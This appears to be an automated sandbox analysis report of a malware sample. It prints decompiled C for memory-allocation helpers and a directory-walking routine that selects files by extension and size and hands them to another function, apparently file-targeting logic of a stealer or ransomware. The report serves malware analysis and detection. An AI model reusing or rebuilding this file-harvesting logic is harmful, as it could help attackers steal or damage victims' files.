                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                          				void** _v24;
                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                          				void** _t16;
                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                          				intOrPtr* _t29;
                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                          				intOrPtr* _t32;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v24 = __ecx;
                                                                                                                                                                                          				 *_t32 = __edx;
                                                                                                                                                                                          				_t31 = __eax & 0xfffff000;
                                                                                                                                                                                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                                                                                          				 *_v24 = _t31;
                                                                                                                                                                                          				_t15 = _v20 - _t31;
                                                                                                                                                                                          				_v24[1] = _t15;
                                                                                                                                                                                          				_t29 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                          				while(_t29 != 0x41c5d4) {
                                                                                                                                                                                          					_t7 = _t29 + 8; // 0x0
                                                                                                                                                                                          					_t17 =  *_t7;
                                                                                                                                                                                          					_t8 = _t29 + 0xc; // 0x0
                                                                                                                                                                                          					_t27 =  *_t8 + _t17;
                                                                                                                                                                                          					if(_t31 > _t17) {
                                                                                                                                                                                          						_t17 = _t31;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if(_t27 > _v20) {
                                                                                                                                                                                          						_t27 = _v20;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if(_t27 > _t17) {
                                                                                                                                                                                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                                                                                          						if(_t15 == 0) {
                                                                                                                                                                                          							_t16 = _v24;
                                                                                                                                                                                          							 *_t16 = 0;
                                                                                                                                                                                          							return _t16;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t29 =  *_t29;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t15;
                                                                                                                                                                                          			}













                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                          • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E004015B0(void* __eax, void** __ecx, void* __edx) {
                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                          				intOrPtr* _t19;
                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                          				void** _t23;
                                                                                                                                                                                          
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                                                                                                                                                          				_t22 = __eax + __edx & 0xfffff000;
                                                                                                                                                                                          				 *__ecx =  *_t23;
                                                                                                                                                                                          				_t7 = _t22 -  *_t23;
                                                                                                                                                                                          				__ecx[1] = _t7;
                                                                                                                                                                                          				_t19 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                          				while(_t19 != 0x41c5d4) {
                                                                                                                                                                                          					_t2 = _t19 + 8; // 0x0
                                                                                                                                                                                          					_t9 =  *_t2;
                                                                                                                                                                                          					_t3 = _t19 + 0xc; // 0x0
                                                                                                                                                                                          					_t14 =  *_t3 + _t9;
                                                                                                                                                                                          					if(_t9 <  *_t23) {
                                                                                                                                                                                          						_t9 =  *_t23;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if(_t22 < _t14) {
                                                                                                                                                                                          						_t14 = _t22;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if(_t14 > _t9) {
                                                                                                                                                                                          						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                                                                                                                                          						if(_t7 == 0) {
                                                                                                                                                                                          							 *0x41c5b0 = 2;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t19 =  *_t19;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                          			}










                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v53;
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v648;
                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                          				char _v656;
                                                                                                                                                                                          				char _v660;
                                                                                                                                                                                          				char _v664;
                                                                                                                                                                                          				char _v668;
                                                                                                                                                                                          				char _v672;
                                                                                                                                                                                          				intOrPtr _v676;
                                                                                                                                                                                          				char _v680;
                                                                                                                                                                                          				char _v684;
                                                                                                                                                                                          				char _v688;
                                                                                                                                                                                          				char _v692;
                                                                                                                                                                                          				char _v696;
                                                                                                                                                                                          				intOrPtr _v700;
                                                                                                                                                                                          				char _v704;
                                                                                                                                                                                          				char _v708;
                                                                                                                                                                                          				char _v712;
                                                                                                                                                                                          				char _v716;
                                                                                                                                                                                          				char _v720;
                                                                                                                                                                                          				char _v724;
                                                                                                                                                                                          				char _v728;
                                                                                                                                                                                          				char _v732;
                                                                                                                                                                                          				char _v736;
                                                                                                                                                                                          				char _v740;
                                                                                                                                                                                          				char _v744;
                                                                                                                                                                                          				intOrPtr _v748;
                                                                                                                                                                                          				char _v752;
                                                                                                                                                                                          				char _v756;
                                                                                                                                                                                          				char _v760;
                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                          				char _v768;
                                                                                                                                                                                          				char _v772;
                                                                                                                                                                                          				char _v776;
                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                          				char _v784;
                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                          				char _v792;
                                                                                                                                                                                          				void* _t239;
                                                                                                                                                                                          				void* _t295;
                                                                                                                                                                                          				intOrPtr* _t299;
                                                                                                                                                                                          				void* _t301;
                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                          				int _t333;
                                                                                                                                                                                          				signed int _t343;
                                                                                                                                                                                          				long _t349;
                                                                                                                                                                                          				int _t354;
                                                                                                                                                                                          				int _t377;
                                                                                                                                                                                          				int _t383;
                                                                                                                                                                                          				void* _t387;
                                                                                                                                                                                          				intOrPtr* _t425;
                                                                                                                                                                                          				intOrPtr _t428;
                                                                                                                                                                                          				intOrPtr* _t456;
                                                                                                                                                                                          				int _t460;
                                                                                                                                                                                          				intOrPtr _t464;
                                                                                                                                                                                          				intOrPtr* _t471;
                                                                                                                                                                                          				intOrPtr _t486;
                                                                                                                                                                                          				intOrPtr _t496;
                                                                                                                                                                                          				intOrPtr _t497;
                                                                                                                                                                                          				intOrPtr _t499;
                                                                                                                                                                                          				void* _t534;
                                                                                                                                                                                          				void* _t556;
                                                                                                                                                                                          				void* _t570;
                                                                                                                                                                                          				void* _t573;
                                                                                                                                                                                          				signed int _t575;
                                                                                                                                                                                          				intOrPtr _t577;
                                                                                                                                                                                          				intOrPtr _t578;
                                                                                                                                                                                          				intOrPtr* _t579;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t574 = __esi;
                                                                                                                                                                                          				_t458 = __ebx;
                                                                                                                                                                                          				_t577 = _t578;
                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                          				_t464 = 0x62;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t464 = _t464 - 1;
                                                                                                                                                                                          					_t580 = _t464;
                                                                                                                                                                                          				} while (_t464 != 0);
                                                                                                                                                                                          				_t1 =  &_v8;
                                                                                                                                                                                          				 *_t1 = _t464;
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v16 =  *_t1;
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				E004040F4( &_v16);
                                                                                                                                                                                          				E004040F4( &_a20);
                                                                                                                                                                                          				_push(_t577);
                                                                                                                                                                                          				_push(0x414c0d);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t578;
                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                          				E004062D8(_v8,  &_v652, _t580);
                                                                                                                                                                                          				E00403BE0( &_v8, _v652);
                                                                                                                                                                                          				E0040377C( &_v656, _a20);
                                                                                                                                                                                          				E0040795C(0x414c2c,  &_v52, _v656, _t580);
                                                                                                                                                                                          				E0040377C( &_v660, _v12);
                                                                                                                                                                                          				E0040795C(0x414c38,  &_v44, _v660, _t580);
                                                                                                                                                                                          				_t239 = E004045EC(_v44);
                                                                                                                                                                                          				_t581 = _t239;
                                                                                                                                                                                          				if(_t239 == 0) {
                                                                                                                                                                                          					L46:
                                                                                                                                                                                          					_pop(_t486);
                                                                                                                                                                                          					 *[fs:eax] = _t486;
                                                                                                                                                                                          					_push(E00414C17);
                                                                                                                                                                                          					E00403B98( &_v792, 2);
                                                                                                                                                                                          					E00403508( &_v784, 2);
                                                                                                                                                                                          					E00403B80( &_v776);
                                                                                                                                                                                          					E00403508( &_v772, 2);
                                                                                                                                                                                          					E00403B98( &_v764, 6);
                                                                                                                                                                                          					E004034E4( &_v740);
                                                                                                                                                                                          					E00403B98( &_v736, 5);
                                                                                                                                                                                          					E00403508( &_v716, 3);
                                                                                                                                                                                          					E00403B98( &_v704, 3);
                                                                                                                                                                                          					E004034E4( &_v692);
                                                                                                                                                                                          					E00403B80( &_v688);
                                                                                                                                                                                          					E004034E4( &_v684);
                                                                                                                                                                                          					E00403B98( &_v680, 5);
                                                                                                                                                                                          					E00403508( &_v660, 2);
                                                                                                                                                                                          					E00403B80( &_v652);
                                                                                                                                                                                          					_t496 =  *0x405f2c; // 0x405f30
                                                                                                                                                                                          					E004047B4( &_v52, _t496);
                                                                                                                                                                                          					E00403B80( &_v48);
                                                                                                                                                                                          					_t497 =  *0x405f2c; // 0x405f30
                                                                                                                                                                                          					E004047B4( &_v44, _t497);
                                                                                                                                                                                          					E00403B98( &_v40, 4);
                                                                                                                                                                                          					_t499 =  *0x4143e4; // 0x4143e8
                                                                                                                                                                                          					E004047B4( &_v24, _t499);
                                                                                                                                                                                          					E00403B98( &_v16, 3);
                                                                                                                                                                                          					_t214 =  &_a20; // 0x414c4c
                                                                                                                                                                                          					return E00403B80(_t214);
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_push(E004045EC(_v24) + 1);
                                                                                                                                                                                          					E004047A8();
                                                                                                                                                                                          					_t579 = _t578 + 4;
                                                                                                                                                                                          					_push(_v24 + E004045EC(_v24) * 4 - 4);
                                                                                                                                                                                          					E0040781C(_v8, __ebx,  &_v664, _t581);
                                                                                                                                                                                          					_pop(_t295);
                                                                                                                                                                                          					E00403BBC(_t295, _v664);
                                                                                                                                                                                          					while(E004045EC(_v24) > 0) {
                                                                                                                                                                                          						_t299 =  *0x41b594; // 0x41c828
                                                                                                                                                                                          						_t34 = _t299 + 4; // 0x0
                                                                                                                                                                                          						_t301 =  *_t299 - 0x4b000;
                                                                                                                                                                                          						asm("sbb edx, 0x0");
                                                                                                                                                                                          						_t471 =  *0x41b63c; // 0x41c820
                                                                                                                                                                                          						_t35 = _t471 + 4; // 0x0
                                                                                                                                                                                          						__eflags =  *_t34 -  *_t35;
                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                          							if(__eflags <= 0) {
                                                                                                                                                                                          								goto L46;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							L8:
                                                                                                                                                                                          							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
                                                                                                                                                                                          							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
                                                                                                                                                                                          							_t312 = E004045EC(_v24) - 1;
                                                                                                                                                                                          							__eflags = _t312;
                                                                                                                                                                                          							_push(_t312);
                                                                                                                                                                                          							E004047A8();
                                                                                                                                                                                          							_t579 = _t579 + 4;
                                                                                                                                                                                          							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
                                                                                                                                                                                          							E0040781C(_v672, _t458,  &_v668, __eflags);
                                                                                                                                                                                          							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								_push(_v28);
                                                                                                                                                                                          								_push(0x414c4c);
                                                                                                                                                                                          								_t474 = 0x104;
                                                                                                                                                                                          								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
                                                                                                                                                                                          								_push(_v680);
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          								E0040781C(_v676, _t458,  &_v32, __eflags);
                                                                                                                                                                                          								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
                                                                                                                                                                                          								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
                                                                                                                                                                                          								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
                                                                                                                                                                                          									L21:
                                                                                                                                                                                          									__eflags = _a8 - 1;
                                                                                                                                                                                          									if(_a8 != 1) {
                                                                                                                                                                                          										L30:
                                                                                                                                                                                          										__eflags = _a12 - 1;
                                                                                                                                                                                          										if(_a12 != 1) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
                                                                                                                                                                                          										E00403E64(_v756, 0x414c70);
                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
                                                                                                                                                                                          										E00403E64(_v760, 0x414c7c);
                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t343 = _v648.dwFileAttributes;
                                                                                                                                                                                          										__eflags = (_t343 & 0x00000010) - 0x10;
                                                                                                                                                                                          										if((_t343 & 0x00000010) != 0x10) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										__eflags = (_t343 & 0x00000400) - 0x400;
                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										E0040781C(_v32, _t458,  &_v764, __eflags);
                                                                                                                                                                                          										_t349 = GetFileAttributesW(E00403D3C(_v764));
                                                                                                                                                                                          										__eflags = _t349 - 0xffffffff;
                                                                                                                                                                                          										if(_t349 == 0xffffffff) {
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_v53 = 0;
                                                                                                                                                                                          										_t458 = E004045EC(_v52) - 1;
                                                                                                                                                                                          										__eflags = _t458;
                                                                                                                                                                                          										if(_t458 < 0) {
                                                                                                                                                                                          											L41:
                                                                                                                                                                                          											__eflags = _v53;
                                                                                                                                                                                          											if(_v53 == 0) {
                                                                                                                                                                                          												_t354 = E004045EC(_v24) + 1;
                                                                                                                                                                                          												__eflags = _t354;
                                                                                                                                                                                          												_push(_t354);
                                                                                                                                                                                          												E004047A8();
                                                                                                                                                                                          												_t579 = _t579 + 4;
                                                                                                                                                                                          												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
                                                                                                                                                                                          											}
                                                                                                                                                                                          											goto L43;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t460 = _t458 + 1;
                                                                                                                                                                                          										_t575 = 0;
                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                          										do {
                                                                                                                                                                                          											E0040781C(_v32, _t460,  &_v776, __eflags);
                                                                                                                                                                                          											E0040377C( &_v772, _v776);
                                                                                                                                                                                          											E00406318(_v772, _t460,  &_v768, _t573, _t575);
                                                                                                                                                                                          											_push(_v768);
                                                                                                                                                                                          											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
                                                                                                                                                                                          											E0040781C(_v792, _t460,  &_v788, __eflags);
                                                                                                                                                                                          											E0040377C( &_v784, _v788);
                                                                                                                                                                                          											E00406318(_v784, _t460,  &_v780, _t573, _t575);
                                                                                                                                                                                          											_pop(_t534);
                                                                                                                                                                                          											_t377 = E00403A78(_v780, _t534);
                                                                                                                                                                                          											__eflags = _t377;
                                                                                                                                                                                          											if(_t377 != 0) {
                                                                                                                                                                                          												_v53 = 1;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											_t575 = _t575 + 1;
                                                                                                                                                                                          											_t460 = _t460 - 1;
                                                                                                                                                                                          											__eflags = _t460;
                                                                                                                                                                                          										} while (__eflags != 0);
                                                                                                                                                                                          										goto L41;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									E0040377C( &_v712, _v36);
                                                                                                                                                                                          									E00406318(_v712, _t458,  &_v708, _t573, _t574);
                                                                                                                                                                                          									_t383 = E00403A78(0x414c58, _v708);
                                                                                                                                                                                          									__eflags = _t383;
                                                                                                                                                                                          									if(_t383 == 0) {
                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									E004141B8(_v32, _t458,  &_v40, _t574);
                                                                                                                                                                                          									_t387 = E004068EC(_v40);
                                                                                                                                                                                          									__eflags = _t387 - _a16;
                                                                                                                                                                                          									if(_t387 > _a16) {
                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t458 = E004045EC(_v44) - 1;
                                                                                                                                                                                          									__eflags = _t458;
                                                                                                                                                                                          									if(_t458 < 0) {
                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t458 = _t458 + 1;
                                                                                                                                                                                          									_t574 = 0;
                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                          										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
                                                                                                                                                                                          										E0040377C( &_v716, _v720);
                                                                                                                                                                                          										_t474 = 0;
                                                                                                                                                                                          										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                          											break;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t574 = _t574 + 1;
                                                                                                                                                                                          										_t458 = _t458 - 1;
                                                                                                                                                                                          										__eflags = _t458;
                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                          											continue;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									E0040781C(_v32, _t458,  &_v724, __eflags);
                                                                                                                                                                                          									E00403BE0( &_v32, _v724);
                                                                                                                                                                                          									E0040781C(_v8, _t458,  &_v728, __eflags);
                                                                                                                                                                                          									E00403BE0( &_v8, _v728);
                                                                                                                                                                                          									E0040781C(_v40, _t458,  &_v732, __eflags);
                                                                                                                                                                                          									E00403BE0( &_v40, _v732);
                                                                                                                                                                                          									_push(_v32);
                                                                                                                                                                                          									_push("._.");
                                                                                                                                                                                          									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
                                                                                                                                                                                          									_push(_v736);
                                                                                                                                                                                          									E00403E1C();
                                                                                                                                                                                          									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
                                                                                                                                                                                          									_push(_v16);
                                                                                                                                                                                          									_push(0x414c4c);
                                                                                                                                                                                          									_push(_v48);
                                                                                                                                                                                          									E00403E1C();
                                                                                                                                                                                          									E0040781C(_v748, _t458,  &_v744, __eflags);
                                                                                                                                                                                          									E0040377C( &_v740, _v744);
                                                                                                                                                                                          									_push(_v740);
                                                                                                                                                                                          									E0040781C(_v40, _t458,  &_v752, __eflags);
                                                                                                                                                                                          									_pop(_t556);
                                                                                                                                                                                          									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
                                                                                                                                                                                          									_v20 = _v20 + 1;
                                                                                                                                                                                          									__eflags = _a4 - 1;
                                                                                                                                                                                          									if(_a4 == 1) {
                                                                                                                                                                                          										_t425 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                          										 *_t425 =  *_t425 + 1;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								__eflags = _v648.nFileSizeHigh;
                                                                                                                                                                                          								if(_v648.nFileSizeHigh != 0) {
                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                          								_push(_v648.nFileSizeLow >> 0xa);
                                                                                                                                                                                          								_t428 = _a16;
                                                                                                                                                                                          								asm("cdq");
                                                                                                                                                                                          								__eflags = 0 - _v56;
                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									L15:
                                                                                                                                                                                          									_t458 = E004045EC(_v44) - 1;
                                                                                                                                                                                          									__eflags = _t458;
                                                                                                                                                                                          									if(_t458 < 0) {
                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t458 = _t458 + 1;
                                                                                                                                                                                          									_t574 = 0;
                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                          										E0040377C( &_v684, _v36);
                                                                                                                                                                                          										_t474 = 0;
                                                                                                                                                                                          										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                          											break;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_t574 = _t574 + 1;
                                                                                                                                                                                          										_t458 = _t458 - 1;
                                                                                                                                                                                          										__eflags = _t458;
                                                                                                                                                                                          										if(_t458 != 0) {
                                                                                                                                                                                          											continue;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										goto L21;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									E0040781C(_v8, _t458,  &_v688, __eflags);
                                                                                                                                                                                          									E00403BE0( &_v8, _v688);
                                                                                                                                                                                          									E0040781C(_v32, _t458,  &_v48, __eflags);
                                                                                                                                                                                          									_t474 = E00403D4C(_v8);
                                                                                                                                                                                          									E00403F34( &_v48, _t443, 1, __eflags);
                                                                                                                                                                                          									_push(_v16);
                                                                                                                                                                                          									_push(0x414c4c);
                                                                                                                                                                                          									_push(_v48);
                                                                                                                                                                                          									E00403E1C();
                                                                                                                                                                                          									E0040781C(_v700, _t458,  &_v696, __eflags);
                                                                                                                                                                                          									E0040377C( &_v692, _v696);
                                                                                                                                                                                          									_push(_v692);
                                                                                                                                                                                          									E0040781C(_v32, _t458,  &_v704, __eflags);
                                                                                                                                                                                          									_pop(_t570);
                                                                                                                                                                                          									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
                                                                                                                                                                                          									_v20 = _v20 + 1;
                                                                                                                                                                                          									__eflags = _a4 - 1;
                                                                                                                                                                                          									if(_a4 == 1) {
                                                                                                                                                                                          										_t456 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                          										 *_t456 =  *_t456 + 1;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								__eflags = _t428 -  *_t579;
                                                                                                                                                                                          								if(_t428 <  *_t579) {
                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                          								L43:
                                                                                                                                                                                          								_t333 = FindNextFileW(_t573,  &_v648);
                                                                                                                                                                                          								__eflags = _t333;
                                                                                                                                                                                          							} while (_t333 != 0);
                                                                                                                                                                                          							FindClose(_t573);
                                                                                                                                                                                          							continue;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						__eflags = _t301 -  *_t471;
                                                                                                                                                                                          						if(_t301 >  *_t471) {
                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                          						} else {
                                                                                                                                                                                          							goto L46;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					goto L46;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}

                                                                                                                                                                                          0x004149b2
                                                                                                                                                                                          0x004149b7
                                                                                                                                                                                          0x004149ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004149c0
                                                                                                                                                                                          0x004149ce
                                                                                                                                                                                          0x004149cf
                                                                                                                                                                                          0x004149d1
                                                                                                                                                                                          0x00414a71
                                                                                                                                                                                          0x00414a71
                                                                                                                                                                                          0x00414a75
                                                                                                                                                                                          0x00414a7f
                                                                                                                                                                                          0x00414a7f
                                                                                                                                                                                          0x00414a80
                                                                                                                                                                                          0x00414a8f
                                                                                                                                                                                          0x00414a94
                                                                                                                                                                                          0x00414aa9
                                                                                                                                                                                          0x00414aa9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414a75
                                                                                                                                                                                          0x004149d7
                                                                                                                                                                                          0x004149d8
                                                                                                                                                                                          0x004149d8
                                                                                                                                                                                          0x004149da
                                                                                                                                                                                          0x004149e3
                                                                                                                                                                                          0x004149f4
                                                                                                                                                                                          0x00414a05
                                                                                                                                                                                          0x00414a10
                                                                                                                                                                                          0x00414a1d
                                                                                                                                                                                          0x00414a2e
                                                                                                                                                                                          0x00414a3f
                                                                                                                                                                                          0x00414a50
                                                                                                                                                                                          0x00414a5b
                                                                                                                                                                                          0x00414a5c
                                                                                                                                                                                          0x00414a61
                                                                                                                                                                                          0x00414a63
                                                                                                                                                                                          0x00414a65
                                                                                                                                                                                          0x00414a65
                                                                                                                                                                                          0x00414a69
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004149da
                                                                                                                                                                                          0x0041476c
                                                                                                                                                                                          0x0041477d
                                                                                                                                                                                          0x0041478d
                                                                                                                                                                                          0x00414792
                                                                                                                                                                                          0x00414794
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147a0
                                                                                                                                                                                          0x004147a8
                                                                                                                                                                                          0x004147ad
                                                                                                                                                                                          0x004147b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147c0
                                                                                                                                                                                          0x004147c1
                                                                                                                                                                                          0x004147c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147c9
                                                                                                                                                                                          0x004147ca
                                                                                                                                                                                          0x004147ca
                                                                                                                                                                                          0x004147cc
                                                                                                                                                                                          0x004147d5
                                                                                                                                                                                          0x004147e6
                                                                                                                                                                                          0x004147f7
                                                                                                                                                                                          0x004147fe
                                                                                                                                                                                          0x00414800
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041490a
                                                                                                                                                                                          0x0041490b
                                                                                                                                                                                          0x0041490b
                                                                                                                                                                                          0x0041490c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041490c
